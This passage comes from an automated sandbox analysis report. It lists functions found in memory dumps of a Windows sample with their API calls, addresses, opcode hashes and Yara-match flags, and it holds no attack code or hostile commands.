                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,10004EC3,00000000,?,00000001,?,?,?,10004FB2,00000001,FlsFree,10011CC0,FlsFree), ref: 10004F1F
                                            • GetLastError.KERNEL32(?,10004EC3,00000000,?,00000001,?,?,?,10004FB2,00000001,FlsFree,10011CC0,FlsFree,00000000,?,10003ECF), ref: 10004F29
                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 10004F51
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2926843521.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926786088.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2926866070.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2926885397.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: LibraryLoad$ErrorLast
                                            • String ID: api-ms-
                                            • API String ID: 3177248105-2084034818
                                            • Opcode ID: 194d23d78a7530926df8253abc19602fce8fc6649c780d967afcd7dccf04e9f6
                                            • Instruction ID: 9caaa85424732638a533447db036373c94518d46a1d9f65793ecca3e1a8de25d
                                            • Opcode Fuzzy Hash: 194d23d78a7530926df8253abc19602fce8fc6649c780d967afcd7dccf04e9f6
                                            • Instruction Fuzzy Hash: 19E01274644245B6FB155B60DC45F993B95DB047D0F118030FA0CA80E5DBB1E99599C9
                                            Function 04B498F3 Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • GetConsoleOutputCP.KERNEL32(0042C014,00000000,00000000,00000000), ref: 04B49956
                                              • Part of subcall function 04B451BF: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,04B45422,?,00000000,-00000008), ref: 04B45220
                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 04B49BA8
                                            • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 04B49BEE
                                            • GetLastError.KERNEL32 ref: 04B49C91
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2925508436.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4b30000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                            • String ID:
                                            • API String ID: 2112829910-0
                                            • Opcode ID: da9c2254c3d6feb7781c277c4017dde1248fb7d9dc01eb7e01956cc2f511bebb
                                            • Instruction ID: 5fcce8b90ce36d0b1d4be8a8766b1e5253630f7b42e27f622126a9e68c5a0279
                                            • Opcode Fuzzy Hash: da9c2254c3d6feb7781c277c4017dde1248fb7d9dc01eb7e01956cc2f511bebb
                                            • Instruction Fuzzy Hash: B3D16CB5E002589FDB15CFE8D880AAEBBF4FF88314F1445AAE456EB351D630A942DB50
                                            Function 0041968C Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • GetConsoleOutputCP.KERNEL32(CA335CE0,00000000,00000000,00000000), ref: 004196EF
                                              • Part of subcall function 00414F58: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,004151BB,?,00000000,-00000008), ref: 00414FB9
                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00419941
                                            • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00419987
                                            • GetLastError.KERNEL32 ref: 00419A2A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                            • String ID:
                                            • API String ID: 2112829910-0
                                            • Opcode ID: 7b6b5b0f837ac57406110df98857d0f42911bc00a2c7897a29ebb1bace7e2d44
                                            • Instruction ID: 80e927e20e1d5b3063f5f9ef1e9119d7a86b1541eeacf5ee68ba8f7951c90f01
                                            • Opcode Fuzzy Hash: 7b6b5b0f837ac57406110df98857d0f42911bc00a2c7897a29ebb1bace7e2d44
                                            • Instruction Fuzzy Hash: 8CD18DB5E002489FCF15CFA8C8909EEBBB5FF49314F28412AE456EB351D634AD86CB54
                                            Function 04B31BA7 Relevance: 6.3, APIs: 4, Instructions: 293networkfileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 04B31C3C
                                            • InternetReadFile.WININET(?,00000000,000003E8,00000000), ref: 04B31C5F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2925508436.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4b30000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FileInternet$PointerRead
                                            • String ID:
                                            • API String ID: 3197321146-0
                                            • Opcode ID: 1885a8dfee8479765fa90636c8dddbf3c0bf84813e2bd3c7ed7779aacb4cd4c8
                                            • Instruction ID: 95f8702ef9bb3bf689eef3f329dca10c55fe83ac12d6f192b76f9b7fd893c877
                                            • Opcode Fuzzy Hash: 1885a8dfee8479765fa90636c8dddbf3c0bf84813e2bd3c7ed7779aacb4cd4c8
                                            • Instruction Fuzzy Hash: 04C14BB09002289FEB25DF69CC84BE9B7B8EF49305F1041D9E409A7290DB75BE94CF91
                                            Function 04B3BCCB Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2925508436.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4b30000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AdjustPointer
                                            • String ID:
                                            • API String ID: 1740715915-0
                                            • Opcode ID: bf321dce71054df2b862cad56193e6d87e1aafecfb24913b63c52c13f6cff331
                                            • Instruction ID: a6ba87058cd3c44807563c279ca24a7e780eaa52e66a2012573d5a7f03c6ba02
                                            • Opcode Fuzzy Hash: bf321dce71054df2b862cad56193e6d87e1aafecfb24913b63c52c13f6cff331
                                            • Instruction Fuzzy Hash: C0511472608606AFEF288F17D840BBA77A4FF04316F1409ADDD014B29AE731F940DB90
                                            Function 04CFAE64 Relevance: 6.2, APIs: 4, Instructions: 168COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000003.2228465890.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_3_4cf0000_file.jbxd
                                            Similarity
                                            • API ID: AdjustPointer
                                            • String ID:
                                            • API String ID: 1740715915-0
                                            • Opcode ID: bf321dce71054df2b862cad56193e6d87e1aafecfb24913b63c52c13f6cff331
                                            • Instruction ID: 9694da84b36eb9287e89cb83653fc82a80706d9e770c7a4cce22b02214fb0c83
                                            • Opcode Fuzzy Hash: bf321dce71054df2b862cad56193e6d87e1aafecfb24913b63c52c13f6cff331
                                            • Instruction Fuzzy Hash: 3D51D4B1601306AFEBA99F51DC40B7AF7B6EF04710F14412DEA094B290E73AFA91D794
                                            Function 0040BA64 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: AdjustPointer
                                            • String ID:
                                            • API String ID: 1740715915-0
                                            • Opcode ID: bf321dce71054df2b862cad56193e6d87e1aafecfb24913b63c52c13f6cff331
                                            • Instruction ID: c3f9129e04d39096db86ee3dbd798fa579d010b72ca6babdac1055268f0b1971
                                            • Opcode Fuzzy Hash: bf321dce71054df2b862cad56193e6d87e1aafecfb24913b63c52c13f6cff331
                                            • Instruction Fuzzy Hash: F651A972600306ABEB298F11C881BAA77B4EF40714F14413FE802A76D5E739AC91CBDD
                                            Function 10003EDA Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2926843521.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926786088.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2926866070.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2926885397.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: AdjustPointer
                                            • String ID:
                                            • API String ID: 1740715915-0
                                            • Opcode ID: 952e73679afc7ae5e9be77ebdc85447c9e7c58ce1189e5957c3f15572caf07ac
                                            • Instruction ID: 9e97f9b43940e94c385e873cf65d718b9a08959cb0185780d8acf6a52a646172
                                            • Opcode Fuzzy Hash: 952e73679afc7ae5e9be77ebdc85447c9e7c58ce1189e5957c3f15572caf07ac
                                            • Instruction Fuzzy Hash: 9D51BFB6A04202AFFB16CF11D941BAB77A8EF047D0F11856DEA05A72A9DB31EC40D794
                                            Function 04B31837 Relevance: 6.2, APIs: 4, Instructions: 162COMMON
                                            Download Yara Rule
                                            APIs
                                            • std::_Xinvalid_argument.LIBCPMT ref: 04B3183C
                                              • Part of subcall function 04B39AA9: std::invalid_argument::invalid_argument.LIBCONCRT ref: 04B39AB5
                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,12041A13,00000000,00000000,?,?,0042D884,?,?,?,0042DAF4), ref: 04B31872
                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,12041A13,00000000,?,0042D884,?,?,?,0042DAF4), ref: 04B318A9
                                            • Concurrency::cancel_current_task.LIBCPMT ref: 04B319BE
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2925508436.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4b30000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ByteCharMultiWide$Concurrency::cancel_current_taskXinvalid_argumentstd::_std::invalid_argument::invalid_argument
                                            • String ID:
                                            • API String ID: 2123813255-0
                                            • Opcode ID: 76bb2ae1955411a23ec2113ce7c3df1698fa8cdaa81397e4e46f03e77a8728ac
                                            • Instruction ID: adb05ec7583511e2c6a15048a151db4dbeef6cf3ff1d0abbd7ffe9812893b520
                                            • Opcode Fuzzy Hash: 76bb2ae1955411a23ec2113ce7c3df1698fa8cdaa81397e4e46f03e77a8728ac
                                            • Instruction Fuzzy Hash: 7E411CB1A00300ABE7149F6A9C8575AB7FCEF48315F1007A9E95AD7280E771BD05C7A1
                                            Function 10007BCE Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 100081F0: _free.LIBCMT ref: 100081FE
                                              • Part of subcall function 10008DC4: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,1000B163,?,00000000,00000000), ref: 10008E70
                                            • GetLastError.KERNEL32 ref: 10007C36
                                            • __dosmaperr.LIBCMT ref: 10007C3D
                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 10007C7C
                                            • __dosmaperr.LIBCMT ref: 10007C83
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2926843521.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926786088.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2926866070.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2926885397.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                            • String ID:
                                            • API String ID: 167067550-0
                                            • Opcode ID: b7af9aa25762b68c67a19e1abcb47a9b758bf4775fc138b5a0a35b694754267d
                                            • Instruction ID: 4d86bd2ae757562d8160192595c5732c56f34f1228d97d68919d00ee2a874974
                                            • Opcode Fuzzy Hash: b7af9aa25762b68c67a19e1abcb47a9b758bf4775fc138b5a0a35b694754267d
                                            • Instruction Fuzzy Hash: 9021AC75A00216AFB720DF658C85D5BB7ADFF042E4B108529FA699724ADB35EC408BA0
                                            Function 04B4770B Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 04B451BF: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,04B45422,?,00000000,-00000008), ref: 04B45220
                                            • GetLastError.KERNEL32 ref: 04B4776F
                                            • __dosmaperr.LIBCMT ref: 04B47776
                                            • GetLastError.KERNEL32(?,?,?,?), ref: 04B477B0
                                            • __dosmaperr.LIBCMT ref: 04B477B7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2925508436.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4b30000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                            • String ID:
                                            • API String ID: 1913693674-0
                                            • Opcode ID: fff5e27c2a9c5f498cd8e37e9d2e5b67da44c55886b9eb81921f36740ae9eac4
                                            • Instruction ID: 88c5d71980c9e0409075f78dccfd4b193e14b2e76ddf052b2edb26fd323ec9cc
                                            • Opcode Fuzzy Hash: fff5e27c2a9c5f498cd8e37e9d2e5b67da44c55886b9eb81921f36740ae9eac4
                                            • Instruction Fuzzy Hash: C121C671600206AFEB20AF75CCC4D6BB7ACFF8826874085A8E92997150EF30FC41EB50
                                            Function 004174A4 Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00414F58: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,004151BB,?,00000000,-00000008), ref: 00414FB9
                                            • GetLastError.KERNEL32 ref: 00417508
                                            • __dosmaperr.LIBCMT ref: 0041750F
                                            • GetLastError.KERNEL32(?,?,?,?), ref: 00417549
                                            • __dosmaperr.LIBCMT ref: 00417550
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                            • String ID:
                                            • API String ID: 1913693674-0
                                            • Opcode ID: fff5e27c2a9c5f498cd8e37e9d2e5b67da44c55886b9eb81921f36740ae9eac4
                                            • Instruction ID: 408a06d1cf8366b2ae1f3811782f7cd1de2d149ac6df674c503089c6b33b154d
                                            • Opcode Fuzzy Hash: fff5e27c2a9c5f498cd8e37e9d2e5b67da44c55886b9eb81921f36740ae9eac4
                                            • Instruction Fuzzy Hash: 2B21CD716042057FDB20AF66C880CAB7779EF44368710852AF91997751D739ED818768
                                            Function 04B41442 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2925508436.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4b30000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
                                            • Instruction ID: 68290cb5ce439fea42b8e551a1101b6167a57ad641936364ea8229848b4c173d
                                            • Opcode Fuzzy Hash: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
                                            • Instruction Fuzzy Hash: 3C219971A00205AFEB10AF7DCC489AB77ADFF842697014595E91AD7150E730FD81AB60
                                            Function 004111DB Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
                                            • Instruction ID: c7293b4e2709a45a538168f771ca0d14dcb5837bd486a4ca313c9b6cb4d0090e
                                            • Opcode Fuzzy Hash: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
                                            • Instruction Fuzzy Hash: DF21C971600219AFDB20AF659C40DEB776DAF44368B10456BFA29E7261D738DC8187A8
                                            Function 04B435A0 Relevance: 6.1, APIs: 4, Instructions: 74COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • FreeLibrary.KERNEL32(00000000,?,04B436AF,04B337FE,?,00000000,04B32A70,04B32A72,?,04B43828,00000022,00420B0C,00422950,00422958,04B32A70), ref: 04B43661
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2925508436.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4b30000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FreeLibrary
                                            • String ID:
                                            • API String ID: 3664257935-0
                                            • Opcode ID: b8c7e483e8ea991eea5b44eb111e182d5bd336103010429673e37ca0c8998616
                                            • Instruction ID: 43ead4c681132c66b8243da1a0b96b107cbd3d1581e49affcb3f026fed018730
                                            • Opcode Fuzzy Hash: b8c7e483e8ea991eea5b44eb111e182d5bd336103010429673e37ca0c8998616
                                            • Instruction Fuzzy Hash: AB210535B05222ABC771AF25EC84A5A3BA8DB82760F1911B0ED05A7391DB30FD02E694
                                            Function 04B486AC Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetEnvironmentStringsW.KERNEL32 ref: 04B486B4
                                              • Part of subcall function 04B451BF: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,04B45422,?,00000000,-00000008), ref: 04B45220
                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 04B486EC
                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 04B4870C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2925508436.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4b30000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                            • String ID:
                                            • API String ID: 158306478-0
                                            • Opcode ID: f25717e6bd25f80c70edce058ac37b14eb42a5c51d25e47d03568e648881f521
                                            • Instruction ID: b80ae5e50ae296269a7b66f3ff14e2998732001f73dcea1ae0fdeffea4d0a09e
                                            • Opcode Fuzzy Hash: f25717e6bd25f80c70edce058ac37b14eb42a5c51d25e47d03568e648881f521
                                            • Instruction Fuzzy Hash: AD11C0BAA016197F7B213B725CDCCBF2DADCEC959830404B4F905E2100FA60EE01A1B6
                                            Function 00418445 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetEnvironmentStringsW.KERNEL32 ref: 0041844D
                                              • Part of subcall function 00414F58: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,004151BB,?,00000000,-00000008), ref: 00414FB9
                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00418485
                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004184A5
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                            • String ID:
                                            • API String ID: 158306478-0
                                            • Opcode ID: 42e04dca39cc9313a1bac36138922e873b2761e214a8738c343e5be4cc190242
                                            • Instruction ID: 9202fe00a5822ec58f1db5debff3a6e736622b39abe9cc99b2a2d556b75614f5
                                            • Opcode Fuzzy Hash: 42e04dca39cc9313a1bac36138922e873b2761e214a8738c343e5be4cc190242
                                            • Instruction Fuzzy Hash: A01104B65005167F6B212BB25D89CEF295CDF89398721402EF905A1201FE2CDE8241BE
                                            Function 10006E9C Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • GetLastError.KERNEL32(?,?,00000000,100059DF,?,10001F4F,00000000), ref: 10006EA1
                                            • _free.LIBCMT ref: 10006EFE
                                            • _free.LIBCMT ref: 10006F34
                                            • SetLastError.KERNEL32(00000000,0000000B,000000FF,?,?,00000000,100059DF,?,10001F4F,00000000), ref: 10006F3F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2926843521.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926786088.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2926866070.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2926885397.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: ErrorLast_free
                                            • String ID:
                                            • API String ID: 2283115069-0
                                            • Opcode ID: 72c61705ed6df8d98b2a0eedb55838999870745f68928b586d93f1ef3c7b0de2
                                            • Instruction ID: 52538b18816049bcedc1269911990ba1ec418b01f35f7c97631a1a3369067357
                                            • Opcode Fuzzy Hash: 72c61705ed6df8d98b2a0eedb55838999870745f68928b586d93f1ef3c7b0de2
                                            • Instruction Fuzzy Hash: BE11E33AA006566AF242D674DC81E6F328BEBC92F57310134F528921D9DE74DE094631
                                            Function 10006FF3 Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • GetLastError.KERNEL32(?,?,?,1000592B,10007A62,?,?,100066F0), ref: 10006FF8
                                            • _free.LIBCMT ref: 10007055
                                            • _free.LIBCMT ref: 1000708B
                                            • SetLastError.KERNEL32(00000000,0000000B,000000FF,?,?,1000592B,10007A62,?,?,100066F0), ref: 10007096
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2926843521.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926786088.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2926866070.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2926885397.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: ErrorLast_free
                                            • String ID:
                                            • API String ID: 2283115069-0
                                            • Opcode ID: cb1c894d2cda448839c8e2a8665fbefda6a0446c15ff34be0ccd710a5c402308
                                            • Instruction ID: 7e0a2054198a3f627b51ebbd791d94cb99ce3d76a099f8cfcb9b0e2a4681bd24
                                            • Opcode Fuzzy Hash: cb1c894d2cda448839c8e2a8665fbefda6a0446c15ff34be0ccd710a5c402308
                                            • Instruction Fuzzy Hash: B8110236E00514AAF352C6748CC5E6F328AFBC92F17210724F52C921EADE79DE048631
                                            Function 04CFAD84 Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                            Download Yara Rule
                                            APIs
                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 04CFADA0
                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 04CFADB9
                                            Memory Dump Source
                                            • Source File: 00000000.00000003.2228465890.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_3_4cf0000_file.jbxd
                                            Similarity
                                            • API ID: Value___vcrt_
                                            • String ID:
                                            • API String ID: 1426506684-0
                                            • Opcode ID: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                                            • Instruction ID: 4984b74ddbc3a4d7bf101f4135ba077788ce0fa155c74b14135f2a0d76b45e70
                                            • Opcode Fuzzy Hash: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                                            • Instruction Fuzzy Hash: 2C0128323083119EB7B027B9BCC4A5B6B56EB013793600239E714520E1FF5EB90261C4
                                            Function 04B4CE4F Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,04B4CAC6,00000000,00000001,?,00000000,?,04B49CE5,00000000,00000000,00000000), ref: 04B4CE66
                                            • GetLastError.KERNEL32(?,04B4CAC6,00000000,00000001,?,00000000,?,04B49CE5,00000000,00000000,00000000,00000000,00000000,?,04B4A288,?), ref: 04B4CE72
                                              • Part of subcall function 04B4CE38: CloseHandle.KERNEL32(0042CA30,04B4CE82,?,04B4CAC6,00000000,00000001,?,00000000,?,04B49CE5,00000000,00000000,00000000,00000000,00000000), ref: 04B4CE48
                                            • ___initconout.LIBCMT ref: 04B4CE82
                                              • Part of subcall function 04B4CDFA: CreateFileW.KERNEL32(00428728,40000000,00000003,00000000,00000003,00000000,00000000,04B4CE29,04B4CAB3,00000000,?,04B49CE5,00000000,00000000,00000000,00000000), ref: 04B4CE0D
                                            • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,04B4CAC6,00000000,00000001,?,00000000,?,04B49CE5,00000000,00000000,00000000,00000000), ref: 04B4CE97
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2925508436.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4b30000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                            • String ID:
                                            • API String ID: 2744216297-0
                                            • Opcode ID: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
                                            • Instruction ID: a0a6d5c076a20b86d1f3861068b1a577eaa5dee5553c036911725988add92e7a
                                            • Opcode Fuzzy Hash: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
                                            • Instruction Fuzzy Hash: 23F0303A541118BBCF325F95DC04ACD3F36FF48AA1B414470FA1996130D732A921ABD4
                                            Function 0041CBE8 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,0041C85F,00000000,00000001,?,00000000,?,00419A7E,00000000,00000000,00000000), ref: 0041CBFF
                                            • GetLastError.KERNEL32(?,0041C85F,00000000,00000001,?,00000000,?,00419A7E,00000000,00000000,00000000,00000000,00000000,?,0041A021,?), ref: 0041CC0B
                                              • Part of subcall function 0041CBD1: CloseHandle.KERNEL32(FFFFFFFE,0041CC1B,?,0041C85F,00000000,00000001,?,00000000,?,00419A7E,00000000,00000000,00000000,00000000,00000000), ref: 0041CBE1
                                            • ___initconout.LIBCMT ref: 0041CC1B
                                              • Part of subcall function 0041CB93: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0041CBC2,0041C84C,00000000,?,00419A7E,00000000,00000000,00000000,00000000), ref: 0041CBA6
                                            • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,0041C85F,00000000,00000001,?,00000000,?,00419A7E,00000000,00000000,00000000,00000000), ref: 0041CC30
                                            Memory Dump Source
